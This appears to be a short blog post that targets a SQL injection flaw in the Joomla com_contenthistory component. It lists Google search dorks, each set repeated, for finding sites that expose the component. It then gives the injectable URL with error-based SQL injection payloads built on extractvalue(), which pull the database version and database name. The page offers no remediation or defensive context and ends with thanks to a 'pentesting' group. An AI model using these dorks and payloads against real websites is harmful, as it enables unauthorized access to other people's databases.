DORK :
inurl:/components/com_contenthistory/
inurl:com_contenthistory
index.php?option=com_contenthistory
"index of" components/com_contenthistory/
inurl:"components/com_contenthistory/"
inurl:"index.php?option=com_contenthistory"
===================================================
inurl:/components/com_contenthistory/
inurl:com_contenthistory
index.php?option=com_contenthistory
"index of" components/com_contenthistory/
inurl:"components/com_contenthistory/"
inurl:"index.php?option=com_contenthistory"
===================================================
EXPLOIT :
/index.php?option=com_contenthistory&view=history&list[select]=1
and extractvalue(rand(),concat(0x0a,version()))-- -
and extractvalue(rand(),concat(0x0a,database()))-- -
===================================================
/index.php?option=com_contenthistory&view=history&list[select]=1
and extractvalue(rand(),concat(0x0a,version()))-- -
and extractvalue(rand(),concat(0x0a,database()))-- -
===================================================
demo vidio Here
Thanks to : Ternate Lab Pantesting
0 Komentar